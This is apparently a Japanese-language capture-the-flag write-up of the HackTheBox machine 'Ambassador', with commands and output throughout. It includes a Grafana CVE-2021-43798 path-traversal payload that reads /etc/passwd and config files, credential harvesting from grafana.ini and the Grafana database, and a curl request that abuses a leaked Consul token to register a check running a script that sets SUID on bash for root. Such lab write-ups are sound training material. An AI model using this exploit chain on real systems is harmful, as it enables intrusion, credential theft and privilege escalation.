🔥

HackTheBox Ambassador

2023/01/30に公開

Ambassador

侵入

nmap

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.183 -oN nmap.log
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
|   256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_  256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Ambassador Development Server
3000/tcp open  ppp?    syn-ack ttl 63
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 23 Oct 2022 05:32:12 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 23 Oct 2022 05:31:38 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 23 Oct 2022 05:31:44 GMT
|_    Content-Length: 0
3306/tcp open  mysql   syn-ack ttl 63 MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.30-0ubuntu0.20.04.2
|   Thread ID: 10
|   Capabilities flags: 65535
|   Some Capabilities: FoundRows, Support41Auth, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, LongPassword, SupportsCompression, Speaks41ProtocolNew, InteractiveClient, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, ODBCClient, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x01
| \x01  ?Gz>>\x0F44wO}T\x0B\x12\x12K
|_  Auth Plugin Name: caching_sha2_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

22、80、3000、3306番を確認

web


特に情報は落ちなかった

3000番にアクセスすると、ログイン画面が出力された
画面の下に、バージョン(8.2.0)が記載されている

CVE-2021-43798

バージョンがわかったので、脆弱性を検索してみる

On 2021-12-03, we received a report that Grafana is vulnerable to directory traversal, allowing access to local files. We have confirmed this for versions v8.0.0-beta1 to v8.3.0. Thanks to our defense-in-depth approach, at no time has Grafana Cloud been vulnerable.

Path Traversal に対して脆弱だという情報を入手。さらに、exploitコードを発見した
exploit -> https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798]
└─$ cat domain.txt  
http://10.10.11.183:3000

実行する前に、domain.txt を作成し、今回の対象マシンのIPアドレスを入力する必要がある

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798]
└─$ python3 exploit.py
  _____   _____   ___ __ ___ _     _ _ ________ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |___| | |__ /__  / _ ( _ )                                                                        
| (__ \ V /| _|___/ / () / /| |___|_  _|_ \ / /\_, / _ \                                                                        
 \___| \_/ |___| /___\__/___|_|     |_|___//_/  /_/\___/                                                                        
                @pedrohavay / @acassio22                                                                                        
                                                                                                                                
? Enter the target list:  domain.txt

========================================

[i] Target: http://10.10.11.183:3000
                                                                                                                                
[!] Payload "http://10.10.11.183:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" works.
                                                                                                                                
[i] Analysing files...
                                                                                                                                
[i] File "/conf/defaults.ini" found in server.
[*] File saved in "./http_10_10_11_183_3000/defaults.ini".
                                                                                                                                
[i] File "/etc/grafana/grafana.ini" found in server.
[*] File saved in "./http_10_10_11_183_3000/grafana.ini".
                                                                                                                                
[i] File "/etc/passwd" found in server.
[*] File saved in "./http_10_10_11_183_3000/passwd".
                                                                                                                                
[i] File "/var/lib/grafana/grafana.db" found in server.
[*] File saved in "./http_10_10_11_183_3000/grafana.db".
                                                                                                                                
[i] File "/proc/self/cmdline" found in server.
[*] File saved in "./http_10_10_11_183_3000/cmdline".
                                                                                                                                
? Do you want to try to extract the passwords from the data source?  Yes

[i] Secret Key: SW2YcwTIb9zpOOhoPsMm                                         
[*] Bye Bye!

実行に成功した
それぞれのファイルが、http_10_10_11_183_3000の配下に作成された

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ cat passwd      
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
grafana:x:113:118::/usr/share/grafana:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
consul:x:997:997::/home/consul:/bin/false

ファイルから、developer ユーザの存在を確認した

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ cat grafana.ini
#################################### Security ####################################
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
;admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = messageInABottle685427

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

さらに、grafana.ini の中に、admin_password を発見

パスワードを使用し、ログインすることができた

sqlite3

取得したファイルには、dbファイルも含まれていたので、sqlite3 を使用する

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ sqlite3 grafana.db     
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite>

テーブルを検索してく

sqlite> .tables
alert                       login_attempt             
alert_configuration         migration_log             
alert_instance              ngalert_configuration     
alert_notification          org                       
alert_notification_state    org_user                  
alert_rule                  playlist                  
alert_rule_tag              playlist_item             
alert_rule_version          plugin_setting            
annotation                  preferences               
annotation_tag              quota                     
api_key                     server_lock               
cache_data                  session                   
dashboard                   short_url                 
dashboard_acl               star                      
dashboard_provisioning      tag                       
dashboard_snapshot          team                      
dashboard_tag               team_member               
dashboard_version           temp_user                 
data_source                 test_data                 
kv_store                    user                      
library_element             user_auth                 
library_element_connection  user_auth_token

user などのテーブルを発見

sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-23 05:27:28|0|{}|1|uKewFgM4z

data_source テーブルに、mysql の認証情報を発見

mysql

認証情報を使用し、mysql へのアクセスを試みる

┌──(kali㉿kali)-[~/Desktop/Ambassador/exploit-grafana-CVE-2021-43798/http_10_10_11_183_3000]
└─$ mysql -h 10.10.11.183 -u grafana -p                                                                                     1 ⨯
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

アクセスに成功した

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| grafana            |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| whackywidget       |
+--------------------+
6 rows in set (0.201 sec)

grafana データベース以外に、whackywidget というデータベースを発見

MySQL [(none)]> use whackywidget
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.207 sec)

user テーブルを発見

MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.297 sec)

developer ユーザのパスワードが base64エンコード された形で出力された

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ echo 'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==' | base64 -d    
anEnglishManInNewYork027468

デコードし、素のパスワードを取得

developer としてのシェル

SSH

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ ssh developer@10.10.11.183                                 
developer@10.10.11.183's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 23 Oct 2022 01:07:05 PM UTC

  System load:           0.0
  Usage of /:            80.9% of 5.07GB
  Memory usage:          39%
  Swap usage:            0%
  Processes:             227
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.183
  IPv6 address for eth0: dead:beef::250:56ff:feb9:85cc


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
developer@ambassador:~$ whoami
developer

侵入成功

user フラグ

developer@ambassador:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

フラグ取得

権限昇格

linpeas.sh

developer@ambassador:~$ ./linpeas.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 16                                                                                                                        
drwxr-xr-x  4 root   root   4096 Sep  1 22:13 .
drwxr-xr-x 20 root   root   4096 Sep 15 17:24 ..
drwxr-xr-x  4 consul consul 4096 Mar 13  2022 consul
drwxrwxr-x  5 root   root   4096 Mar 13  2022 my-app

opt の中に、consul と my-app というディレクトリを発見

consul

consul から調べてみる。サービスの発見や検出を行ってくれるらしい

┌──(kali㉿kali)-[~/Desktop/Ambassador]
└─$ searchsploit consul
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)                            | linux/remote/46073.rb
Hashicorp Consul - Remote Command Execution via Services API (Metasploit)                     | linux/remote/46074.rb
Hassan Consulting Shopping Cart 1.18 - Directory Traversal                                    | cgi/remote/20281.txt
Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution                            | cgi/remote/21104.pl
PHPLeague 0.81 - '/consult/miniseul.php?cheminmini' Remote File Inclusion                     | php/webapps/28864.txt
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

なんとなく脆弱性を検索すると、何件かヒットしたので、Webで調べてみる
参考記事 -> https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/consul_service_exec

This module exploits Hashicorp Consul's Services API to gain remote command
execution on a Consul node.

サービスAPIを使うことで、任意のコマンドを実行できるらしいが、ボックス上で実行する手段がなさそう

res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {
        ID: service_name.to_s,
        Name: service_name.to_s,
        Address: '127.0.0.1',
        Port: 80,
        check: {
          Args: [arg1, arg2, cmd.to_s],
          interval: '10s',
          Timeout: '86400s'
        }
      }.to_json
})

公開されているコードを見てみると、必要なパラメータがわかった。
しかし、token が見つからないため、my-app を調べてみることにする。

developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13  2022 .
drwxr-xr-x 4 root root 4096 Sep  1 22:13 ..
drwxrwxr-x 4 root root 4096 Mar 13  2022 env
drwxrwxr-x 8 root root 4096 Mar 14  2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13  2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13  2022 whackywidget

my-app の中を確認すると .git ディレクトリを発見した

developer@ambassador:/opt/my-app$ git show
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000
​
    tidy config script
​
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD

履歴をみると、consul の token が出力された。
あとは、server_name の値があれば攻撃できそう。

def execute_command(cmd, _opts = {})
    uri = target_uri.path
    service_name = Rex::Text.rand_text_alpha(5..10)
    print_status("Creating service '#{service_name}'")

よく見てみると、server_name はランダムで生成されていることがわかる
つまり、自分で適当に指定してよい値である

curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "shoo", "Name": "shoo", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/shoo.sh"], "interval": "10s", "timeout": "86400s"}}' http://127.0.0.1:8500/v1/agent/service/register

今まで集めた情報から上記の curl コマンドを作成
今回は、shoo.sh を実行させることにより、権限昇格を狙う

developer@ambassador:~$ echo 'chmod +s /usr/bin/bash' > /tmp/shoo.sh

ちなみに、shoo.sh というのは、bash に +s を付与するスクリプトである

developer@ambassador:~$ find / -type f -user root -perm -4000 2>/dev/null
/usr/bin/umount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/bash
/usr/bin/su
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/fusermount

curl コマンドを実行し、-perm -4000 で検索すると、bash が含まれていることがわかる

root としてのシェル

bash

developer@ambassador:~$ bash -p
bash-5.0# whoami
root

権限昇格成功

root フラグ

bash-5.0# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

フラグ取得

所感

今回のボックスは、今までのボックスのところどころを切り取ったような形で復習としてかなりいいボックスだった。サービスAPIに関しては普段APIを開発していることがプラスに働いたなと感じた。今後も開発の勉強を続け、開発者としての視点も捉えながら攻略するようにしたい。

Discussion